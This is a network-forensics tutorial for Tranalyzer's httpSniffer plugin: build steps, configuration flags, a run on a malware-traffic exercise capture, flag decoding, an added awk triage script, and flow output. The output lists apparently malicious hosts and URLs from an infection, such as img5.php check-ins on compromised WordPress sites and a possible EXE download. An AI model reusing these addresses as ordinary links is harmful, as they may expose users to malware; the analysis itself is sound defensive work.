HTTP: HyperText Transfer Protocol

data carving HTTP layer 7

Introduction

This tutorial discusses the plugin httpSniffer.

Preparation

First, restore T2 into a pristine state by removing all unnecessary or older plugins from the plugin folder ~/.tranalyzer/plugins:

t2build -e -y

Are you sure you want to empty the plugin folder '/home/wurst/.tranalyzer/plugins' (y/N)? yes
Plugin folder emptied

Then compile the core (tranalyzer2) and the following plugins:

t2build tranalyzer2 basicFlow tcpStates httpSniffer txtSink

...
BUILD SUCCESSFUL

If you have not yet created separate data and results directories, do so now in another bash window; this makes the workflow easier:

mkdir ~/data ~/results

The sample PCAP used in this tutorial can be downloaded here: 2015-05-08-traffic-analysis-exercise.pcap (Source: malware-traffic-analysis.net).

Please save it in your ~/data folder.

Now you are all set for analyzing HTTP traffic!

httpSniffer

Let’s look at the plugin configuration first:

httpSniffer

vi src/httpSniffer.h

As you can see below, you can enable or disable any HTTP field to tailor the flow output to your needs. Note that some fields can be aggregated in the output to avoid multiple entries, which would otherwise eat up space in your flow file.

By default everything is enabled.

Any content, e.g., pictures, videos or text, can be extracted to files by enabling the HTTP_SAVE_* constants. As this function can produce a large number of files from large PCAPs, it is advisable to run the plugin first without the extract function.

All paths can be changed; by default they reside in the /tmp directory.

...
/* ========================================================================== */
/* ------------------------ USER CONFIGURATION FLAGS ------------------------ */
/* ========================================================================== */

#define HTTP_MIME      1 // 1: print mime type in flow file; 0: print # of mime types only
#define HTTP_STAT      1 // 1: print response status code in flow file; 0: print # of status codes only
#define HTTP_MCNT      1 // 1: method counts: GET, POST
#define HTTP_HOST      1 // 1: print hosts in flow file; 0: print # of hosts only
#define HTTP_URL       1 // 1: print URL in flow file; 0: print # of URL only
#define HTTP_COOKIE    1 // 1: print cookies in flow file; 0: print # of cookies only
#define HTTP_IMAGE     1 // 1: print image name in flow file; 0: print # of images only
#define HTTP_VIDEO     1 // 1: print video name in flow file; 0: print # of videos only
#define HTTP_AUDIO     1 // 1: print audio name in flow file; 0: print # of audios only
#define HTTP_MSG       1 // 1: print message name in flow file; 0: print # of messages only
#define HTTP_APPL      1 // 1: print application name in flow file; 0: print # of applications only
#define HTTP_TEXT      1 // 1: print text name in flow file; 0: print # of texts only
#define HTTP_PUNK      1 // 1: print POST/unknown and all else name in flow file; 0: print # of POST/unknown/else only
#define HTTP_BODY      1 // 1: content body exam, print anomaly bits in flow file; 0: none
#define HTTP_BDURL     1 // 1: print body url name in flow file; 0: none
#define HTTP_USRAG     1 // 1: print User-Agents in flow file; 0: none
#define HTTP_XFRWD     1 // 1: print X-Forwarded-For in flow file; 0: none
#define HTTP_REFRR     1 // 1: print Referer in flow file; 0: none
#define HTTP_VIA       1 // 1: print Via in flow file; 0: none
#define HTTP_LOC       1 // 1: print Location in flow file; 0: none
#define HTTP_SERV      1 // 1: print Server in flow file; 0: none
#define HTTP_PWR       1 // 1: print X-Powered-By in flow file; 0: none

#define HTTP_STATAGA   1 // 1: aggregate stat response in flow file; 0: dont
#define HTTP_MIMEAGA   1 // 1: aggregate mime response in flow file; 0: dont
#define HTTP_HOSTAGA   1 // 1: aggregate Host in flow file; 0: dont
#define HTTP_URLAGA    1 // 1: aggregate URL in flow file; 0: dont
#define HTTP_USRAGA    1 // 1: aggregate User-Agents in flow file; 0: dont
#define HTTP_XFRWDA    1 // 1: aggregate X-Forwarded-For in flow file; 0: dont
#define HTTP_REFRRA    1 // 1: aggregate Referer in flow file; 0: dont
#define HTTP_VIAA      1 // 1: aggregate Via in flow file; 0: dont
#define HTTP_LOCA      1 // 1: aggregate Location in flow file; 0: dont
#define HTTP_SERVA     1 // 1: aggregate Server in flow file; 0: dont
#define HTTP_PWRA      1 // 1: aggregate X-Powered-By in flow file; 0: dont

//#define HTTP_ENT  0    // entropy calculation, not implemented yet

// data carving modes
#define HTTP_SAVE_IMAGE   0 // 1: Save images in files under HTTP_IMAGE_PATH; 0: Don't save images
#define HTTP_SAVE_VIDEO   0 // 1: Save videos in files under HTTP_VIDEO_PATH; 0: Don't save videos
#define HTTP_SAVE_AUDIO   0 // 1: Save audios in files under HTTP_TEXT_PATH; 0: Don't save audios
#define HTTP_SAVE_MSG     0 // 1: Save messages in files under HTTP_MSG_PATH; 0: Don't save pdfs
#define HTTP_SAVE_TEXT    0 // 1: Save texts in files under HTTP_TEXT_PATH; 0: Don't save text
#define HTTP_SAVE_APPL    0 // 1: Save applications in files under HTTP_TEXT_PATH; 0: Don't save applications
#define HTTP_SAVE_PUNK    0 // 1: Save PUT/else content in files under HTTP_PUNK_PATH; 0: Don't save PUT content

#define HTTP_DATA_C_MAX  40 // Maximum dimension of storage arrays per flow
#define HTTP_MXFILE_LEN  80 // Maximum storage name length
#define HTTP_MXUA_LEN   400 // User-Agent length
#define HTTP_MXXF_LEN    80 // X-Forwarded-For length
//#define HTTP_MXCK_LEN   150 // maximum cookie

//#define HTTP_MAXPBIN (1 << 8)

/* +++++++++++++++++++++ ENV / RUNTIME - conf Variables +++++++++++++++++++++ */

#define HTTP_RMDIR        1 // empty HTTP_*_PATH before starting (require at least one of HTTP_SAVE*=1)

// User defined storage boundary conditions
#define HTTP_PATH       "/tmp"        // Root path for extracted files

#define HTTP_IMAGE_PATH "httpPicture" // Path for pictures
#define HTTP_VIDEO_PATH "httpVideo"   // Path for videos
#define HTTP_AUDIO_PATH "httpAudio"   // Path for audios
#define HTTP_MSG_PATH   "httpMSG"     // Path for messages
#define HTTP_TEXT_PATH  "httpText"    // Path for texts
#define HTTP_APPL_PATH  "httpAppl"    // Path for applications
#define HTTP_PUNK_PATH  "httpPunk"    // Path for POST / else / unknown content

#define HTTP_NONAME     "nudel"       // name of files without name

/* ========================================================================== */
/* ------------------------- DO NOT EDIT BELOW HERE ------------------------- */
/* ========================================================================== */
...

Now run t2 on the supplied PCAP:

t2 -r ~/data/2015-05-08-traffic-analysis-exercise.pcap -w ~/results/ -s

================================================================================
Tranalyzer 0.9.1 (Anteater), Cobra. PID: 28406, Prio: 0, SID: 666
================================================================================
[INF] Creating flows for L2, IPv4, IPv6
Active plugins:
    01: basicFlow, 0.9.1
    02: tcpStates, 0.9.1
    03: httpSniffer, 0.9.1
    04: txtSink, 0.9.1
[INF] IPv4 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 481438 (481.44 K)
[INF] IPv6 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 41486 (41.49 K)
Processing file: /home/user/data/2015-05-08-traffic-analysis-exercise.pcap
Link layer type: Ethernet [EN10MB/1]
Snapshot length: 65535 (65.53 K)
Dump start: 1431031896.723375000 sec (Thu 07 May 2015 20:51:36 GMT)
Dump stop : 1431032021.842982000 sec (Thu 07 May 2015 20:53:41 GMT)
Total dump duration: 125.119607000 sec (2m 5s)
Finished processing. Elapsed time: 0.014296888 sec
Finished unloading flow memory. Time: 0.014935613 sec
Percentage completed: 100.00%
Number of processed packets: 761
Number of processed bytes: 495665 (495.67 K)
Number of raw bytes: 495665 (495.67 K)
Number of pad bytes: 1857 (1.86 K)
Number of pcap bytes: 507865 (507.87 K)
Number of IPv4 packets: 761 [100.00%]
Number of A packets: 305 [40.08%]
Number of B packets: 456 [59.92%]
Number of A bytes: 34638 (34.64 K) [6.99%]
Number of B bytes: 461027 (461.03 K) [93.01%]
<A packet load>: 113.57
<B packet load>: 1011.02
--------------------------------------------------------------------------------
tcpStates: Aggregated tcpStatesAFlags=0x42
httpSniffer: Aggregated httpStat=0x003c
httpSniffer: Aggregated httpAFlags=0x1103
httpSniffer: Aggregated httpCFlags=0x0010
httpSniffer: Aggregated httpHeadMimes=0x0045
httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0
httpSniffer: Number of HTTP packets: 399 [52.43%]
httpSniffer: Number of HTTP GET  requests: 28 [7.02%]
httpSniffer: Number of HTTP POST requests: 9 [2.26%]
httpSniffer: HTTP GET/POST ratio: 3.11
--------------------------------------------------------------------------------
Headers count: min: 3, max: 3, avg: 3.00
Number of TCP packets: 745 [97.90%]
Number of TCP bytes: 493885 (493.88 K) [99.64%]
Number of UDP packets: 16 [2.10%]
Number of UDP bytes: 1780 (1.78 K) [0.36%]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Number of processed      flows: 68
Number of processed IPv4 flows: 68 [100.00%]
Number of processed A    flows: 34 [50.00%]
Number of processed B    flows: 34 [50.00%]
Number of request        flows: 34 [50.00%]
Number of reply          flows: 34 [50.00%]
Total   A/B    flow asymmetry: 0.00
Total req/rply flow asymmetry: 0.00
Number of processed A+B packets/A+B flows: 11.19
Number of processed A   packets/A   flows: 8.97
Number of processed   B packets/  B flows: 13.41
Number of processed total packets/s: 6.08
Number of processed A+B   packets/s: 6.08
Number of processed A     packets/s: 2.44
Number of processed   B   packets/s: 3.64
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<Number of processed flows/s>: 0.54
<Bandwidth>: 31574 b/s (31.57 Kb/s)
<Raw bandwidth>: 31692 b/s (31.69 Kb/s)
Max number of flows in memory: 56 [0.02%]
Memory usage: 0.04 GB [0.05%]
Aggregated flowStat=0x0400000000004000
[INF] IPv4 flows

The aggregated httpStat tells us that the capture contains HTTP traffic. The aggregated bit fields from the end report can be decoded with tawk -V:

tawk -V httpStat=0x003c -V httpAFlags=0x1103 -V httpCFlags=0x0010 -V httpHeadMimes=0x0045

The httpStat column with value 0x003c is to be interpreted as follows:

   bit | httpStat | Description
   =============================================================================
     2 | 0x0004   | Internal state: pending URL name
     3 | 0x0008   | HTTP flow
     4 | 0x0010   | Internal state: Chunked transfer
     5 | 0x0020   | Internal state: HTTP flow detected


The httpAFlags column with value 0x1103 is to be interpreted as follows:

   bit | httpAFlags | Description
   =============================================================================
     0 | 0x0001     | POST query with parameters
     1 | 0x0002     | Host is IPv4, e.g., Host: 1.2.3.4
     8 | 0x0100     | X-Site Scripting protection
    12 | 0x1000     | Possible EXE download


The httpCFlags column with value 0x0010 is to be interpreted as follows:

   bit | httpCFlags | Description
   =============================================================================
     4 | 0x0010     | Potential HTTP content


The httpHeadMimes column with value 0x0045 is to be interpreted as follows:

   bit | httpHeadMimes | Description
   =============================================================================
     0 | 0x0001        | Application
     2 | 0x0004        | Image
     6 | 0x0040        | Text
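
The aggregated values only say that a bit was set somewhere in the capture. As an added example (not part of the tutorial or of Tranalyzer), the plain-awk function below finds the flows that set each httpAFlags bit, using the bit meanings printed by tawk -V above. The function names, the reduced six-column sample and the flow 99 row are assumptions made for the illustration.

```sh
#!/bin/sh
# Added example: per-flow triage of httpAFlags from a Tranalyzer flow file.
# Portable POSIX awk: no strtonum() or and(), which are gawk-only.

# write_sample_flows FILE
# Constructed sample with six columns only. Flows 5, 8, 15 and 21 copy values
# from rows shown on this page; flow 99 is invented to show two bits at once.
write_sample_flows() {
    {
        printf '%%dir\tflowInd\tsrcIP\tdstIP\thttpStat\thttpAFlags\n'
        printf 'B\t5\t62.75.195.236\t192.168.138.158\t0x0068\t0x0000\n'
        printf 'B\t8\t62.75.195.236\t192.168.138.158\t0x0068\t0x1000\n'
        printf 'B\t15\t188.165.164.184\t192.168.138.158\t0x0078\t0x0100\n'
        printf 'A\t21\t192.168.138.158\t72.34.49.86\t0x006c\t0x0001\n'
        printf 'A\t99\t192.168.138.158\t203.0.113.7\t0x006c\t0x0003\n'
    } > "$1"
}

# http_aflags_triage FLOWFILE
# Prints one line per flow with a non-zero httpAFlags and names the set bits.
# Columns are located by header name, so the plugin set may differ.
http_aflags_triage() {
    awk -F '\t' '
    # Convert a string such as "0x1103" to a number; -1 if it is not hex.
    function hex2num(s,    i, n, d) {
        s = tolower(s)
        sub(/^0x/, "", s)
        if (s == "") return -1
        n = 0
        for (i = 1; i <= length(s); i++) {
            d = index("0123456789abcdef", substr(s, i, 1)) - 1
            if (d < 0) return -1
            n = n * 16 + d
        }
        return n
    }
    # Return 1 if bit b of v is set.
    function bitset(v, b) { return int(v / 2 ^ b) % 2 }

    BEGIN {
        # Only the bits decoded on this page are named.
        name[0]  = "POST query with parameters"
        name[1]  = "Host is IPv4"
        name[8]  = "X-Site Scripting protection"
        name[12] = "Possible EXE download"
    }
    NR == 1 {
        # Header row starts with "%dir"; map column names to field numbers.
        sub(/^%/, "", $1)
        for (i = 1; i <= NF; i++) col[$i] = i
        n = split("dir flowInd srcIP dstIP httpAFlags", need, " ")
        for (i = 1; i <= n; i++)
            if (!(need[i] in col)) {
                print "missing column: " need[i] > "/dev/stderr"
                exit 2
            }
        next
    }
    /^%/ || /^#/ { next }          # skip any further comment lines
    {
        v = hex2num($(col["httpAFlags"]))
        if (v <= 0) next           # no flag set, or field is not hex
        out = ""
        for (b = 0; b < 16; b++) {
            if (!bitset(v, b)) continue
            label = (b in name) ? name[b] : ("bit " b " (not listed on this page)")
            out = out (out == "" ? "" : "; ") label
        }
        printf "flow=%s dir=%s src=%s dst=%s httpAFlags=%s: %s\n", \
            $(col["flowInd"]), $(col["dir"]), $(col["srcIP"]), \
            $(col["dstIP"]), $(col["httpAFlags"]), out
    }
    ' "$1"
}

# Demo on the constructed sample.
tmp=$(mktemp)
write_sample_flows "$tmp"
http_aflags_triage "$tmp"
rm -f "$tmp"
```

On a real run, pass the flow file written by t2, e.g. ~/results/2015-05-08-traffic-analysis-exercise_flows.txt.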

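The end report also gives the number of files per content type, img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0, i.e., 13 images, 22 texts and 10 applications. To list the flows that contain images, texts or applications, split the httpImg_Vid_Aud_Msg_Txt_App_Unk column: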

tawk '{ split($httpImg_Vid_Aud_Msg_Txt_App_Unk, A, "_"); if (A[1] || A[5] || A[6]) print }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | tcol

%dir  flowInd  flowStat            timeFirst             timeLast              duration      numHdrDesc  numHdrs  hdrDesc       srcMac             dstMac             ethType  vlanID  srcIP            srcIPCC  srcIPOrg                          srcPort  dstIP            dstIPCC  dstIPOrg                          dstPort  l4Proto  tcpStatesAFlags  httpStat  httpAFlags  httpMethods  httpHeadMimes  httpCFlags  httpGet_Post  httpRSCnt  httpRSCode  httpURL_Via_Loc_Srv_Pwr_UAg_XFr_Ref_Cky_Mim  httpImg_Vid_Aud_Msg_Txt_App_Unk  httpHosts                          httpURL                                                        httpMimes                               httpCookies                                                                    httpImages                                                                                 httpVideos  httpAudios  httpMsgs  httpAppl                                                                httpText                                                                httpPunk  httpBdyURL  httpUsrAg                                                                                                                                                         httpXFor  httpRefrr                                         httpVia  httpLoc  httpServ                                          httpPwr
B     2        0x0400000000004001  1431031897.090353000  1431031897.467080000  0.376727000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49184    6        0x00             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__285a4d4e4e5a4d4d4649584c5d43064b4745_2_B_1_0"                                                                                                                                                                                                                                                                                              "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     7        0x0400000000004001  1431031898.870027000  1431031899.146185000  0.276158000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49188    6        0x00             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_aa25f5fe2875e3d0a244e6969e589cc4_7_B_1_0"                                                                                                                                                                                                                                                                                                   "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
A     21       0x0400000000004000  1431031903.508284000  1431031905.661649000  2.153365000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49198    72.34.49.86      us       "IHNetworks"                      80       6        0x00             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg"        "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_A_1_0"                                                                                                      "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     21       0x0400000000004001  1431031903.559171000  1431031905.661533000  2.102362000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49198    6        0x00             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_B_1_0"                                                                                                                                                                                                                                                                              "Apache"                                          "PHP/5.3.29"
A     23       0x0400000000004000  1431031905.838183000  1431031908.624824000  2.786641000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49200    72.34.49.86      us       "IHNetworks"                      80       6        0x00             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42"        "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_A_1_0"                                                                                                      "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     23       0x0400000000004001  1431031905.940902000  1431031908.624779000  2.683877000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49200    6        0x00             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_B_1_0"                                                                                                                                                                                                                                                                              "Apache"                                          "PHP/5.3.29"
B     15       0x0400000000004001  1431031902.907008000  1431031903.049134000  0.142126000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           188.165.164.184  fr       "OVH-MNT"                         80       192.168.138.158  07       "Private network"                 49195    6        0x02             0x0078    0x0100      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/plain"                                                                                                                                                                                                                                                                                                                "__15_B_1_0"                                                                                                                                                                                                                                                                                                                                  "DYNAMIC+"                                        
A     27       0x0400000000004000  1431031915.188019000  1431031917.179846000  1.991827000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49204    72.34.49.86      us       "IHNetworks"                      80       6        0x00             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9"          "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_A_1_0"                                                                                                        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     27       0x0400000000004001  1431031915.292307000  1431031917.179749000  1.887442000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49204    6        0x00             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_B_1_0"                                                                                                                                                                                                                                                                                "Apache"                                          "PHP/5.3.29"
B     6        0x0400000000004001  1431031897.801147000  1431031961.652768000  63.851621000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49186    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__6_B_1_0"                                                                                                                                                                                                                                                                                                                                   "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     32       0x0400000000004001  1431031946.186389000  1431031950.230839000  4.044450000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49208    6        0x02             0x0068    0x0000      0x00         0x0004         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          2_0_0_0_0_0_0                                                                                                                      "image/png"                                                                                                            "_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_32_B_1_0";"_img_rb.png_32_B_3_1"                                                                                                                                                                                                                                                                                                                                                                                                                                                          "nginx/1.2.1"                                     "PHP/5.4.39-0+deb7u2"
B     5        0x0400000000004001  1431031897.787957000  1431031898.067694000  0.279737000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49185    6        0x02             0x0068    0x0000      0x00         0x0001         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_0_1_0                                                                                                                      "application/x-shockwave-flash"                                                                                                                                                                                                                     "__5_B_1_0"                                                                                                                                                                                                                                                                                                                                                                                                           "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     8        0x0400000000004001  1431031899.272356000  1431031900.101930000  0.829574000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49189    6        0x02             0x0068    0x1000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__b514ee6f0fe486009a6d83b035a4c0bd_8_B_1_0"                                                                                                                                                                                                                                                                                                  "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     9        0x0400000000004001  1431031901.437910000  1431031901.594209000  0.156299000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49190    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__b2566564b3ba1a38e61c83957a7dbcd5_9_B_1_0"                                                                                                                                                                                                                                                                                                  "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     31       0x0400000000004001  1431031946.186400000  1431031952.217120000  6.030720000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49207    6        0x02             0x0068    0x0000      0x00         0x0004         0x0010      0_0           1          200         0_0_0_1_0_0_0_0_0_2                          2_0_0_0_0_0_0                                                                                                                      "image/png";"image/vnd.microsoft.icon"                                                                                 "_img_flags_es.png_31_B_1_0";"_favicon.ico_31_B_2_1"                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               "nginx/1.2.1"                                     
B     10       0x0400000000004001  1431031901.748731000  1431031901.905523000  0.156792000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49191    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__3a08b0be8322c244f5a1cb9c1057d941_10_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     11       0x0400000000004001  1431031902.059710000  1431031902.440796000  0.381086000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49192    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__d71e0bd86db9587158745a986a4b3606_11_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     12       0x0400000000004001  1431031902.592729000  1431031902.752525000  0.159796000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49193    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__34eaf8bd50d85d8c6baacb45f0a7b22e_12_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
B     14       0x0400000000004001  1431031902.893639000  1431031903.051071000  0.157432000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49194    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__60dbe33b908e0086292196ef001816bc_14_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
A     18       0x0400000000004000  1431031903.090317000  1431031903.288476000  0.198159000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49197    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg"  "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_A_1_0"                                                                                                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     18       0x0400000000004001  1431031903.132272000  1431031903.288564000  0.156292000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49197    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_B_1_0"                                                                                                                                                                                                                                                                        "Apache"                                          
